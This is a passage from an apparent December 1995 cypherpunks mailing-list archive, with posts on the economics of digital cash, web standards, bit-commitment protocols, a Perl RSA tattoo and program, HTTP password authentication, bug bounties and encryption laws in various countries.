of money, cash, and value. Another significant impact has stemmed out of research into the root of interest gaps in the money market. Citicorp has claimed that around 2/5 of the interest charged on a consumer finance loan is in branch delivery and management costs. This cost could be reduced substantially with increased adoption of electronic means of payments. It has been estimated that the interest differentials in the money market could be drastically reduced with adoption. After examining these three electronic payments systems and there impacts, it should be noted that no single system is �best�. Which system is adopted depends largely on the needs of the transaction and the agents. On the consumer�s side, survey data20 shows that the single most important factor is wide acceptance of the system. Thus it may be that any system, whether it is formally standardized and secured or not, could gain market dominance and remain in that position by virtue of its ad-hoc standard. Sellers would use it because most customers use it; customers would use it because most sellers use it. The main channel for competition would not be in price of the system, but in gaining exclusive rights to the point of sale of a large number of merchants. This environment would make electronic payments widely available in a relatively short time span, but is not exactly conductive to diversity or technological advancement. This would be analogous with the entrenched tri- opoly of Visa, Mastercard, and American Express in the credit card market. An alternative to this situation might be the wide adoption of an open standard electronic payment system. In this case, any intermediary would jointly adopt an inter-operatable system, whereby the client of one system could transparently conduct transactions with any other seller who�s intermediary uses the same system. This would be similar to the openness and competition in Thailand's ATM system, where the 2 main ATM consortiums (ATM Pool and BankNet) support an open system. The holder of a Bangkok Bank ATM card can withdraw money from, say, a Thai Farmers Bank ATM. Such an open electronic payment system would have several advantages over a proprietary electronic payment system. � Choice. Users could be given better choice and services. Since there could be several intermediaries vying for the same open market, they would have to use a policy of differentiation. Such a structure would bring about a monopolistic competition type market, the "market" being the market for open-standard electronic payments. Hopefully, this differentiation would be for the benefit of users. � Policy. Government policy implementation would be less ambiguous. Generally, the fewer heterogeneous systems there are to regulate, the more effective government policy would be on each system. This is because each system would need a specific interpretation of the applicable laws. Since in most nations, the legislative process can't enact new laws with high speed, the "applicable laws" tend to be arcane and controversial. Combined with the constrained capacity of the state, this might cause an ambiguous period of years before systems can be finalized. The ambiguity during this period can kill of enthusiasm for new systems, leading confused agents to return to conventional paper methods of payment. It could also lead to market distortions, as misguided governments could give anti- competition concessions to single firms. � Simplicity. Open standard electronic payments systems would provide a consistency in payments from the users side. It is a general design principle in computer-human interaction engineering that consistent interfaces are synonymous with the efficiency of the system. Survey data21 has shown that simplicity is the second most important aspect that is looked for in an electronic payments system. Thus the consistency of an open standard would contribute to its wide adoption. Despite the advantages of open standard electronic payments systems, it is also likely that a variety of standards could simultaneously gain market acceptance. This would not be through conventional price competition, but rather by seeking niches in the market. For example, it is highly likely that some form of electronic cash system will gain a market niche due to its strong point of unquestionable privacy. Besides the easily targetable markets of "socially deviant" products like pornography (one of the most popular products of the Global Internet) or weapons design (the users of which tend to be very paranoid), it would also gain acceptance from users who are uneasy with the fact that each and every one of there transactions would be documented by the banking system. Fear of such information getting into the hands of the few (or the hands of the state) will most probably cause users to move to a more private system. Such concerns for privacy and fear of powerful corporations have crystallized into the cypherpunk and cyberpunk movements, small but vocal special interest groups who are often listened to by governments22. Other niches might include government subsidized ones for the payment of various state benefits. The United States Department of Nutrition has already implemented an advanced �Virtual Food Stamp� system in New York City23. Groceries with a large portion of low-income customers are required to install electronic payment systems at the point of sale. Customers can buy there groceries without using cash, there being an automatic transfer of funds from their food stamp account to the groceries account. This system reduces long lines at government offices, eliminates the black market in redeeming food stamps for cash, and significantly reduces the shuffling of paper of all parties. This system is used by 500,000 people and is favored over the old system by 94% of them. Like any new technology, it would be impractical to think of the status of electronic payments as clearly defined. Although the technology has existed for decades to implement many systems, they have just begun to permeate into the everyday consumer�s lives. The number of merchants accepting eCash numbers less than a hundred. Card based electronic cash systems have only been implemented in pilot projects in a handful of cities over the globe. Never the less, the trends of modern commerce, driven by the weaknesses of traditional payments systems, point to the eventual rise of electronic payments. It is just a matter or time and spirit. Footnotes 1 from J. C. Wood and D. S. Smith �Electronic Transfer of Government Benifits� Federal Reserve Bulletin V.77 N.4 April 1991 2 D. Gleason as quoted by S. Levy �E-Money (That's what I want)� Wired V.2 N.12 as archived in http://www.hotwired.com/wired/2.12/features/ emoney.html on the internet 3 via Regulation E implementing the Electronic Funds Transfer Act of 1979 (15 U.S.C. 1693) as quoted in J. C. Wood and D. S. Smith, op. cit. 4 from the news group soc.culture.thai 5 As can be seen from the atmosphere of various sites on the internet. Most explicit is the cypherpunks mailing list at cypherpunks at toad.com 6 These characteristics, and the mathematical theories that underpin them were developed over several years in the cypherpunks mailing list and the future culture mailing list at futurec at uafsysb.uark.edu 7 S. Levy op. cit. 8 S. Levy op. cit. 9 heard from the future culture mailing list, op. cit. 10 S. Levy �The End of Money?� Time 6 Nov 1995 P.38-44 11 announced in the cypherpunks mailing list 12 details of the protocol and messaging system were publicized in the internet at http://www.digicash.com/ecash/protpublish.html 13 described in the eCash/Mark Twain Bank FAQ at http://www.marktwain.com/digifaq.html and the eCash FAQ at http://www.digicash.com/ecash/faq.html 14 This is claimed in the eCash/Mark Twain Bank FAQ. But the same document also states that WorldCurrency Access accounts do not earn interest and have no fixed time periods. 15 PGP public key encryption is a highly popular defacto standard due to its high security and its zero price. 16 This is to conform with conventional banking laws concerning the documentation of transactions. 17 D. Chaum �Showing credentials without identification: transferring signatures between unconditionally unlikely pseudonyms� (Springer-Verlig, Berlin) p.946-64 (Conference: Advances in Cryptology-AUSCRYPT '90 International Conference on Cryptology. Proceedings, Sydney 8-11 January 1990) 18 Just another incentive to backup data 19 the eCash protocol specification at http://www.digicash.com/ecash/ protpublish.html 20 from the internet money survey conducted by the Management School at Imperial College. Archived at http://www.tu.ac.th/thammasat/pati/money.survey.results 21 See fn. 20 22 The Electronic Frontier Foundation has had close links with the Clinton Administration. The Cypherpunks mailing list catalyzed public protest that eventually brought down the government supported Clipper Chip 23 See J. C. Wood and D. S. Smith, op. cit. ------------------------------------------------------------------------------- Patiwat Panurach Whatever you can do, or dream you can, begin it. eMAIL: pati at ipied.tu.ac.th Boldness has genius, power and magic in it. m/18 junior Fac of Economics -Johann W.Von Goethe ------------------------------------------------------------------------------- --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 "Reality is not optional." --Thomas Sowell The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/ >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From vznuri at netcom.com Wed Dec 20 00:47:20 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Wed, 20 Dec 95 00:47:20 PST Subject: on web standards: sent to Markoff Message-ID: <199512200844.AAA24193@netcom6.netcom.com> here's a quickie rant about software standards sent to Markoff, precipitated by his recent column on Berners Lee & the Web. please help kill the urban legend I refer to in this letter. ------- Forwarded Message Subject: tim berners lee etc. Date: Wed, 20 Dec 95 00:39:44 -0800 From: "Vladimir Z. Nuri" I read your recent article on Tim Berners Lee. there is a misconception in the article that annoys me and that I have seen you/others repeat elsewhere. the following myth is: COMPANIES SET STANDARDS. this is not really true. in the short term, companies can set whatever "standards" they like. but in the long term, the *market* decides what standards are acceptable. an example of this was IBM: they set various standards until the market decided that the "standards" they were setting were not acceptable. they became their own worst enemy. no amount of shovelling their ideas down consumer's throats via million dollar ad campaigns or sales pressure changed the basic reality of what the market wanted. even though "microchannel" may have been technically superior, consumers consistently decided the proprietary price of the architecture was not worth the extra economic burden to obtain it. you and others are continually reiterating and reinforcing this myth in regards to web software in your writing. you talk about various companies as if they could somehow seize various standards for their own and exclude other companies (Netscape's supposed proprietary web "standards" are an example). this is fallacious for the reason I outlined above. the market may not tolerate this exclusivity, and particularly in the area of computer software and hardware this has been shown emphatically so. furthermore, the idea that companies can legislate their own web standards is particularly ludicrous. it is true that netscape has added their own "extensions" that their own browser understands and other browsers initially do not. but nothing prevents other companies from immediately incorporating these "enhancements" so that they are recognized by their own software. in fact this is trivial to do so in many cases (e.g. one of these so-called "enhancements" is blinking text in web pages). so the idea that a single web company can somehow monkeywrench the standards process by introducing new ideas is absurd and completely ignorant of reality. in fact this rapid "standard" fluctation is the heart of innovation. it is true that the web standard is fluctuating very rapidly right now, but that is not evidence of companies trying to seize the standard for their own: instead it is the chief sign of dynamic and rapid innovation. I urge you to read Bill Gate's recent book. he addresses this continual myth that people yammer about, namely the idea that individual companies can set exclusive or proprietary standards. a company standard is in fact a sort of temporary whirlpool in time: it will exist only so long as the forces surrounding it support it. a single company can temporarily create an illusion that their standards are the only ones available, but the market may eventually decide that their standard is not appropriate. Microsoft would crumble in a short amount of time if they failed to deliver what the market demands, and Gates reiterates this theme. it is tempting to think of Microsoft or Netscape as large behemoths that "drive the market". this is true in the short term but in truth over the long term the market drives these companies, and they lose market share if they become irrelevant. it is useful to look at one company as a focus of market forces, not the determinant of them. in my opinion the idea that various companies are in control of the market is not only erroneous but highly dangerous. it leads to the view that the government has to step in to promote "fair competition" or "legislate standards". these approaches are usually total failures because they completely neglect the true nature of the innovation of ideas, something that is expressed quite tangibly and viscerally in software development, but this simple point various people still utterly fail to grasp. its quite dramatic to write about single companies such as Microsoft or Netscape as if they have tremendous power and influence over the industry. various companies have found however that this influence is highly fleeting if they are not in tune with market currents. companies are subservient to the market, not vice versa. please strive to recognize this basic fact in your future writing. p.s. I am willing to work this into a letter to the editor if you are willing to publish it. From postmaster at interserv.com Tue Dec 19 08:56:00 1995 From: postmaster at interserv.com (Interserv Operations) Date: Wed, 20 Dec 1995 00:56:00 +0800 Subject: Mailbox soft limit exceeded Message-ID: <199512191618.IAA28242@m1.interserv.com> Your mailbox has exceeded the soft size limit of 8MB. Mail will continue to be delivered to your mailbox until it reaches the hard size limit of 15MB. please removed unecessary messages from you mailbox. Additionally, if you're using CompuServe/Spry AirMail you may choose the local inbox option which will download the mail from your remote inbox to your local system inbox before allowing you to read it. PLEASE NOTE: Use of the local inbox option will preclude accessing the downloaded mail messages except from the system on which the messages were downloaded. -- Interserv Network Operations Center Postmaster at interserv.com 2001 6th Ave. Suite 3025B noc at interserv.net Seattle, WA. 95121 CompuServe/Internet Division From bart at netcom.com Wed Dec 20 01:01:24 1995 From: bart at netcom.com (Harry Bartholomew) Date: Wed, 20 Dec 95 01:01:24 PST Subject: cyphernomicon FTP site? In-Reply-To: Message-ID: <199512200858.AAA26214@netcom23.netcom.com> > > At 04:18 PM 12/19/95 -0500, you wrote: > >Anyone know where I can FTP a full copy of the cyphernomicon? > > > > I'm interested in this too. I really HATE those silly HTML documents that > can't (or, at least, I haven't yet figured out how) be downloaded in one > swell foop. > When using lynx from my shell account, I like to grab the whole thing at once at net speed. Just now this took 65 seconds for the 1.28 Mb with obvious pauses ( I've seen it twice as fast). http://www.swiss.ai.mit.edu/6095/articles/cyphernomicon/CP-FAQ From rah at shipwright.com Tue Dec 19 09:05:52 1995 From: rah at shipwright.com (Robert Hettinga) Date: Wed, 20 Dec 1995 01:05:52 +0800 Subject: (fwd) Economics of Digital Money. Message-ID: --- begin forwarded text Date: Tue, 19 Dec 1995 12:42:23 +0700 (GMT+0700) From: Patiwat Panurach To: ecash at digicash.com Subject: Economics of Digital Money. MIME-Version: 1.0 Sender: owner-ecash at digicash.com Precedence: bulk Reply-To: ecash at digicash.com The Economics of Digital Commerce: An analysis of Digital Cash, ElectronicFund Transfers, and eCash By: Patiwat Panurach Faculty of Economics Thammasat University Bangkok, Thailand The extraordinary growth of international interconnected computer networks and the pervasive trend of commerce to utilize these networks as a new field for there operations has catalyzed the demand for new methods of payments. These new methods must attain unprecedented levels of security, speed, privacy, decentralization, and internationalization for �digital commerce� to be accepted by both consumers and entrepreneurs. This paper seeks to analyze 3 such methods of electronic payments. First shall be the generic type of electronic fund transfer that is widely in use. Second, the ongoing proposals for an open �digital cash� standard. Lastly is a real world technology currently in implementation called eCash. These 3 methods are examined in terms of the dynamics of transaction clearance, the effects on money supply and the macroeconomy, there classification in terms of �money� or �cash�, and the comparative viewpoints of monetary authorities, financial institutions, and consumers. This paper will not attempt to go into detail on the myriad of encryption systems, protocols, algorithms and other technical matters concerning the new systems. These are all secondary aspects of electronic payment. As there basis, electronic payment systems are simply logical evolutionary steps that began with the realization of the limits of barter. The need to pay for transactions is the root of all electronic payment systems. The first method of electronic payments that shall be examined has been in use for a relatively long time. It is the �electronic checking system�. For many, �Electronic Checking� and �Electronic Payment� are the same thing, although this is not always so. Electronic Checking simply uses the existing banking structure to its fullest potential by eliminating paper checks. Electronic Checking is an extremely varied system. Some examples of it include � paying for university fees via ATM card � paying telephone bills via monthly bank account deductions � large value overseas fund transfers Conceptually, Electronic Checking, and almost all Electronic Payments, involves 3 agents1: 1. buyer 2. seller 3. intermediary The buyer initiates a transaction with the seller and the seller demands payment. The buyer then obtains a unique certification of payment (physically called a check) from the intermediary. This debits the buyer's account with the intermediary The buyer then gives the certification to the seller and the seller gives the certification to the intermediary. This credits the seller's account with the intermediary. Schematically, this is a �conventional� checking transaction. But when it is conducted electronically, the certification is an electronic flow that is documented by the intermediary. Most important, the attainment of the certification, the transfer of the certification, and the debiting and crediting of the accounts occurs instantaneously. If the buyer and seller don't use the same intermediary, some standardized clearing house system between intermediaries is usually used. Since electronic checking is essentially checking, it can be analyzed as checking. Payments made via electronic checking would be conducted outside of cash and paper. Instead of sending a check or paying at a counter, the buyer would initiate an electronic checking certification. If this is done as a substitute for paying in cash, electronic checking could susbstantually reduce the transactions demand for money. In essence, this is not electronic checking but electronic cash. But if it is a substitute for conventional checking, it would just increase the speed of the transaction. From the economic standpoint, there is no difference in the dynamics of the checking process from normal checks --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 "Reality is not optional." --Thomas Sowell The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/ >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From futplex at pseudonym.com Wed Dec 20 01:27:32 1995 From: futplex at pseudonym.com (Futplex) Date: Wed, 20 Dec 95 01:27:32 PST Subject: Bit Commitment Query In-Reply-To: <30D7A993.3F54@maths.su.oz.au> Message-ID: <199512200927.EAA27328@thor.cs.umass.edu> robbie gates, apprentice algebraist writes: > In essence, why doesn't the following work: > > 1. Alice has a bit b. She picks a random bit string R and sends Bob > h(R,b) > > 2. To verify, she tells Bob R and b. > > Assuming Bob knows b is a single bit, how does Alice cheat without needing > to produce hash collisions for h. Hmmm. I can't see anything wrong with your reasoning, and I too am puzzled by Schneier's comment about Alice needing to send R_1 to Bob initially. I hope someone else will give a more authoritative answer. Your question prompted me to study the other bit commitment protocols in _AC_ a bit more closely (pun not intended). Schneier observes that the b.c. with hash function protocol you cited has an advantage over the b.c. protocol with symmetric encryption he describes (v.1,pg.72). Namely, the hashing b.c. protocol only needs one-way communication after the protocol negotiation. It seems to me that the encryption b.c. protocol he gives can easily be modified to require only one-way communication (Alice-->Bob). The modified protocol goes like this: [0] Alice has a bit b, and generates a secret key K and a random string R. [1] Alice --- E_K(R, b), R --> Bob [2] Alice wants to reveal her committed bit. [3] Alice --- K --> Bob [4] Bob computes D_K(E_K(R, b)) = (R, b) and checks the value of b (or cries foul if R has the wrong value) This can't possibly be a new idea, but I don't know the literature well enough to give a reference. Of course, the other possibility is that this protocol is broken. :} If E is a good encryption algorithm, it should be hard for Alice to find K_2 s.t. D_K_2(E_K(R, b)) = (R, 1-b), even though she gets to choose R. Comments ? Why might we prefer to use the encryption b.c. protocol in Schneier to something like the above ? -Futplex R.I.P. Brian Jones (apprentice cryptographer) From aba at dcs.exeter.ac.uk Wed Dec 20 01:58:46 1995 From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk) Date: Wed, 20 Dec 95 01:58:46 PST Subject: [even more NOISE] BIO-MUNITION: gifs of perl-RSA tattoo Message-ID: <22479.9512200957@exe.dcs.exeter.ac.uk> Alan Olsen writes: > [Much noise on Perl-RSA tatoo and compile problems deleted] > > The only thought that came to mind on this thread was how closely > the tatoo artist spellchecked that tatoo. It would be pretty funny > to have a "munitions violation" that was non-functional due to > tatooing errors. Funny you should say that... I thought I'd better check (before you mentioned this btw) by transcribing from the (slightly grainy) gif, and Richard did miss one char, fortunately in an easily correctable position. I'd guess his wife has probably tattooed the missing ` by now. (The ` was missing from the line: $m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa but there was a bit of white space between the = and the e -- plenty enough for a ` -- phew that was close! While I'm here generating noise, someone just sent me this: #!/usr/local/bin/perl -s-- -export-a-crypto-system-sig -RSA-5-lines-PERL do 'bigint.pl';($_,$n)=@ARGV;s/^.(..)*$/0$&/;($k=unpack('B*',pack('H*',$_)))=~ s/^0*//;$x=0;$z=$n=~s/./$x=&badd(&bmul($x,16),hex$&)/ge;while(read(STDIN,$_,$w =((2*$d-1+$z)&~1)/2)){$r=1;$_=substr($_."\0"x$w,$c=0,$w);s/.|\n/$c=&badd(&bmul ($c,256),ord$&)/ge;$_=$k;s/./$r=&bmod(&bmul($r,$r),$x),$&?$r=&bmod(&bmul($r,$c ),$x):0,""/ge;($r,$t)=&bdiv($r,256),$_=pack(C,$t).$_ while$w--+1-2*$d;print} Significance? It's in pure perl -- no use of dc. I was *very* impressed. It's a fair bit slower unfortunately, but some people objected to the other one on the grounds that it was cheating to use an external program (dc). Also that will work on PCs without mods. Adam From hallam at w3.org Tue Dec 19 10:57:02 1995 From: hallam at w3.org (hallam at w3.org) Date: Wed, 20 Dec 1995 02:57:02 +0800 Subject: Political Cleanup program [NOISE] In-Reply-To: <199512190442.UAA14637@ix3.ix.netcom.com> Message-ID: <9512191622.AA13870@zorch.w3.org> >I happen to believe in freedom of speech, especially political speech, >and if you're not allowed to spend money broadcasting your speech or >printing your messages, you don't have much freedom of press or speech. It is very strange the way that "Libertarians" are so able to turn all rights into property rights. Thus freedom of speech become freedom to have influence on the politicial process in direct proportion to wealth. I began work on the web in '92 because I saw its potential as a political tool which did not have the bias of wealth. It has the potential to create a new kind of political dialogue. When the Web becomes as ubiquitous as the telephone we will still see inequalities of power, the homeless and the poor will still be underrepresented. But that situation must be judged against our own where the political process can be bought and traded as if it were any other form of comodity. It is not simply an issue of money, it is an issue of national security. If a foreigner were to control the majority of the media there would be a significant threat to the national interest. This threat has been realised in the UK with the comming to power of Rupert Murdoch. Fortunately his influence on the US political scene has thus far been minor. In his own country he has brought down the government more than once. >And as far as "prevent the political process from being owned by the rich" >goes, there have been brief exceptions over the last 5000 years in which >the less-rich have overthrown the rich, but campaign finance laws have almost >never kept the rich or the politicians from helping each other out. In UK politicis the influence of an individual's money is limited to influencing one party. Even that is done behind closed doors. The other major parties both limit the size of individual contributions to a constituency party to a relatively nominal sum. $5000 is a huge sum in UK politics. >I also don't believe freedom of speech should be limited by national >boundaries. Nor do I. But I only vote in one country. If we take the question outside the US it would not on the whole be a good thing if the Prime Minister of Tobago (say) were provided with a campaign contribution of $1M by a foreign company with an interest in strip mining the entire island. similarly it would be a bad thing if Columbian drug lords were to make massive contributions to politicians committed to continuing the prohibition on drugs. Phill From karl at cosmos.cosmos.att.com Wed Dec 20 03:57:41 1995 From: karl at cosmos.cosmos.att.com (Karl A. Siil) Date: Wed, 20 Dec 95 03:57:41 PST Subject: (Fwd) SECURITY ALERT: Password protection bug in Netscape 2.0b Message-ID: <2.2b9.32.19951220115525.0069303c@cosmos.cosmos.att.com> At 05:46 PM 12/18/95 -0800, Rich Graves wrote: >Except for the bit about the file not being deleted after quitting >Netscape (which is Bad), this is old news. This is why security-conscious >sites like banking.wellsfargo.com ask for passwords in an SSL-encrypted >form rather than via simple browser authentication. On a related note, how does Netscape (or HTTP in general) authenticate using the password? My best guess, without a sniffer, is (making up error codes as I go along, but you get the point): Browser Sends: GET ... Server Replies: 4xx (3xx? 2xx?) Sorry. I need authentication. Browser (after querying user): GET along with user-name/password Server: ...whatever the page is... Given that, what allows me to go on and see other (protected) pages on the same server without being re-prompted? Is it a similar conversation to the one above or does the browser broadcast the password on every subsequent request? I cannot ascertain the behavior by going to another site protected by a different password. Either one is possible. What I'm hoping happens with multiple sites is: Browser Sends: GET ... Server Replies: 4xx (3xx? 2xx?) Sorry. I need authentication. Browser (after querying user): GET along with user-name/password Server: ...whatever the page is... (1)Browser (to a different server): GET ... Server2: 4xx (3xx? 2xx?) Sorry. I need authentication. Browser: user-name/password cached from before Server2: 4xx (3xx? 2xx?) Sorry. That's not it. I need authentication. (2)Browser (after re-querying user): GET user-name2/password2 Server: ...whatever the page is... The broadcast option would change (1) to (2) above to: (1)Browser (to a different server): GET along with user-name/password Server2: 4xx (3xx? 2xx?) Sorry. (That's not it?) I need authentication. (2)Browser (after re-querying user): GET user-name2/password2 Admittedly, the second one is more optimal, but does this mean it would broadcast the user/passwd to every site? Even the first option winds up sending wrong passwords to other servers. Does the browser re-prompt if it detects a new IP address or a different sub-tree of the same server? Anyway, lots of conjecture (sp?) here. Does anyone know how it really works or can point me at a reference? Thanks. Karl From karl at cosmos.cosmos.att.com Wed Dec 20 04:23:47 1995 From: karl at cosmos.cosmos.att.com (Karl A. Siil) Date: Wed, 20 Dec 95 04:23:47 PST Subject: revised time quantization package (Unix & WIN32) available Message-ID: <2.2b9.32.19951220122140.00684794@cosmos.cosmos.att.com> At 10:32 PM 12/19/95 GMT, ECafe Anonymous Remailer wrote: > >And why do we tolerate Jeff Weinstein and Mat Blaze calling themselves >cypherpunks, when they are so clearly just working us for their >corporate interests? I wonder how much they get paid to monitor this >list? Matt, if you're getting paid to read this list, I want a new contract. Karl A. Siil AT&T BCS Advanced Projects 908-949-4037 908-949-8978 (FAX) karl at cosmos.cosmos.att.com !karlsiil From visentin at imdwd01.milano.italtel.it Wed Dec 20 05:35:17 1995 From: visentin at imdwd01.milano.italtel.it (visentin at imdwd01.milano.italtel.it) Date: Wed, 20 Dec 95 05:35:17 PST Subject: Which countries don't allow encryption ? Message-ID: <9512201335.AA01573@imdwd01> Hi all, Apologies in advance if anyone feels this is off topic... I'm trying to address the following issue: people at my company need to exchange sensitive information with their colleagues abroad (e.g. East Europe, or Southern America). Of course, the most obvious way to protect our data is to encrypt everything, regardless how we communicate (either via e-mail or sending magnetic media). So we should use PGPi, but...it seems to me there is a _problem_. I read somewhere that Russian law forbids the use on encryption: is this correct ? Let me generalize this first question: which countries in the world don't allow encryption usage, or encrypted traffic inside their boundaries ? or allow, but provided certain conditions are satisfied ? 2nd question: which way(s) could we meet the laws in, let me say, East Europe while protecting our info ? (I'd like to avoid giving away our keys, as I'd requested -possibly- in France, so maybe encryption is not suitable). Please e-mail directly to me, since I'm not a subscriber of this list (I tried it, but it is a too high volume and specialization level for me). Thanks in advance, Franco Visentin ( visentin at milano.italtel.it ) From E.J.Koops at kub.nl Wed Dec 20 06:16:23 1995 From: E.J.Koops at kub.nl (Bert-Jaap Koops) Date: Wed, 20 Dec 95 06:16:23 PST Subject: Which countries don't allow encryption ? Message-ID: <1DBA4168EA@frw3.kub.nl> > Let me generalize this first question: which countries > in the world don't allow encryption usage, or encrypted > traffic inside their boundaries ? or allow, but provided > certain conditions are satisfied ? See my Crypto Law Survey. NOTE: the URL has changed. Please reset your pointers to: http://cwis.kub.nl/~frw/CRI/projects/bjk/lawsurvy.html I shall update it in the first week of January and provide some more pointers to online information. Regards, Bert-Jaap ---------------------------------------------------------------------- Bert-Jaap Koops tel +31 13 466 8101 Center for Law and Informatization facs +31 13 466 8102 Tilburg University e-mail E.J.Koops at kub.nl -------------------------------------------------- Postbus 90153 | This world's just mad enough to have been made | 5000 LE Tilburg | by the Being his beings into being prayed. | The Netherlands | (Howard Nemerov) | --------------------------------------------------------------------- http://www.kub.nl:2080/FRW/CRI/people/bertjaap.htm --------------------------------------------------------------------- From jeffb at sware.com Wed Dec 20 06:24:48 1995 From: jeffb at sware.com (Jeff Barber) Date: Wed, 20 Dec 95 06:24:48 PST Subject: (Fwd) SECURITY ALERT: Password protection bug in Netscape In-Reply-To: <2.2b9.32.19951220115525.0069303c@cosmos.cosmos.att.com> Message-ID: <199512201501.KAA28003@jafar.sware.com> Karl A. Siil writes: > On a related note, how does Netscape (or HTTP in general) authenticate using > the password? My best guess, without a sniffer, is (making up error codes as > I go along, but you get the point): > Anyway, lots of conjecture (sp?) here. Does anyone know how it really works > or can point me at a reference? Thanks. http://www.w3.org/hypertext/WWW/Protocols/HTTP1.0/draft-ietf-http-spec.html#AA -- Jeff From rsalz at osf.org Tue Dec 19 15:05:18 1995 From: rsalz at osf.org (Rich Salz) Date: Wed, 20 Dec 1995 07:05:18 +0800 Subject: Please help Message-ID: <9512191501.AA05363@sulphur.osf.org> Please help. Somehow, someone signed up the "cypherpunks" mailing list to your "ZD Net Update" electronic newsletter. Our mailing list, with over a thousand members, is for the discussion of cryptography and technical means of achieving privacy and anonymity in the emergent digital world. There is some overlap between your publication and our mailing list, which is why some well-meaning individual "signed us up." It's pretty slight, however, and interested parties can sign up individually. So, please remove cypherpunks at toad.com from your mailing list. As always, if you ahve questions about the propriety of this, you can follow the internet conventions of writing to postmaster at toad.com to double-check. Thanks. /r$ From anonymous-remailer at shell.portal.com Tue Dec 19 15:06:44 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Wed, 20 Dec 1995 07:06:44 +0800 Subject: PAY-OFF TIME FOR BUG-BUSTERS, NETSCAPE PLEDGES "DOGFIGHT" Message-ID: <199512191557.HAA10769@jobe.shell.portal.com> On 18 Dec 1995, Ian Goldberg wrote: > In article <199512151800.KAA11304 at jobe.shell.portal.com>, > wrote: > >On Mon, 11 Dec 1995, Michael Coates wrote: > > > >> PAY-OFF TIME FOR BUG-BUSTERS, NETSCAPE PLEDGES "DOGFIGHT" > >> Netscape Communications has awarded two software sleuths $1,000 each > >> for finding security gaps in its Netscape Navigator 2.0 software. The > >> company also awarded gifts to 50 other contestants in its "Bugs Bounty" > >> program for identifying non-security problems. (Wall Street Journal > >> 11 Dec 95 B7) > > > >Can anyone tell me whether Ian Goldberg and David Wagner got their $25,000 > >from Netscape for finding the HUGE security flaws in Netscape's existing > >product line?? > > > >I can't remember whether they got anything or not ... > > That would be no (well, except for the nifty T-shirt from Sameer; Thanks!). Not anything?? That's shameful ... where on earth are the values in America, today? AT&T and Netscape have jointly made a small fortune distributing this product, and yet NEITHER company feels that the software engineers who "voluntarily" made a difference -- a couple of students -- deserve even a wooden nickel for the ideas which were used. It's absolutely shameful. But then, I guess that AT&T and Netscape have no shame at all. They just steal "intellectual property" from students, and don't even pay a token amount. And people wonder what's wrong with Aemrica? > - Ian "There's a reason people talk about `starving grad students'..." > From dlv at bwalk.dm.com Wed Dec 20 07:44:48 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Wed, 20 Dec 95 07:44:48 PST Subject: revised time quantization package (Unix & WIN32) available In-Reply-To: <2.2b9.32.19951220122140.00684794@cosmos.cosmos.att.com> Message-ID: "Karl A. Siil" writes: > At 10:32 PM 12/19/95 GMT, ECafe Anonymous Remailer wrote: > > > >And why do we tolerate Jeff Weinstein and Mat Blaze calling themselves > >cypherpunks, when they are so clearly just working us for their > >corporate interests? I wonder how much they get paid to monitor this > >list? > > Matt, if you're getting paid to read this list, I want a new contract. Karl, are you an unpaid volunteer at AT&T, or do you quit your job every time you read your e-mail? --- Dr. Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From E.J.Koops at kub.nl Wed Dec 20 07:53:44 1995 From: E.J.Koops at kub.nl (Bert-Jaap Koops) Date: Wed, 20 Dec 95 07:53:44 PST Subject: Correct URL Crypto Law Survey Message-ID: <1F59210729@frw3.kub.nl> >http://cwis.kub.nl/~frw/CRI/projects/bjk/lawsurvy.html Sorry, the URL should be: http://cwis.kub.nl/~frw/CRI/projects/bjk/lawsurvy.htm Bert-Jaap. From dlv at bwalk.dm.com Wed Dec 20 08:11:18 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Wed, 20 Dec 95 08:11:18 PST Subject: Which countries don't allow encryption ? In-Reply-To: <9512201335.AA01573@imdwd01> Message-ID: <75ZegD4w165w@bwalk.dm.com> visentin at imdwd01.milano.italtel.it writes: > I'm trying to address the following issue: people at > my company need to exchange sensitive information with > their colleagues abroad (e.g. East Europe, or Southern > America). ... > I read somewhere that Russian law forbids the use on > encryption: is this correct ? More or less. President Yeltsin's edict of April 3, 1995, prohibits the use of encryption without a licence from FAPSI. I've been told that "everybody" continues to use PGP and no one's had any trouble yet. However in today's climate I can imagine a Western business blatantly violating the edict, being threatened with prosecution, and being shaken down for a bribe... For a peace of mind, why don't your correspondents go to FASPI and simply ask for a licence. They're nice people. You might have more of a problem in France, where, as far as I know, you must deposit your cryptographic keys with the government, so it may read your correspondence. Soon this may be required in the U.S. as well. --- Dr. Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From alano at teleport.com Wed Dec 20 09:06:26 1995 From: alano at teleport.com (Alan Olsen) Date: Wed, 20 Dec 95 09:06:26 PST Subject: cyphernomicon FTP site? Message-ID: <2.2b7.32.19951220170717.008dcd74@mail.teleport.com> At 12:59 AM 12/20/95 -0800, you wrote: >At 9:18 PM 12/19/95, Vinod Valloppillil wrote: >>Anyone know where I can FTP a full copy of the cyphernomicon? [Much deleted] >Anybody who plans to download the entire linear file and then print it out >must be missing a bits in his shift register. There are reasons to want a non-html version. The best being uploading to your favorite text-oriented BBSes. (Or crypto-oriented BBSes.) Not everyone has access to the web. (Yes, I know it is blasphemy...) | Remember: Life is not always champagne. Sometimes it is REAL pain. | |"The moral PGP Diffie taught Zimmerman unites all| Disclaimer: | | mankind free in one-key-steganography-privacy!" | Ignore the man | |`finger -l alano at teleport.com` for PGP 2.6.2 key | behind the keyboard.| | http://www.teleport.com/~alano/ | alano at teleport.com | From hfinney at shell.portal.com Wed Dec 20 09:21:19 1995 From: hfinney at 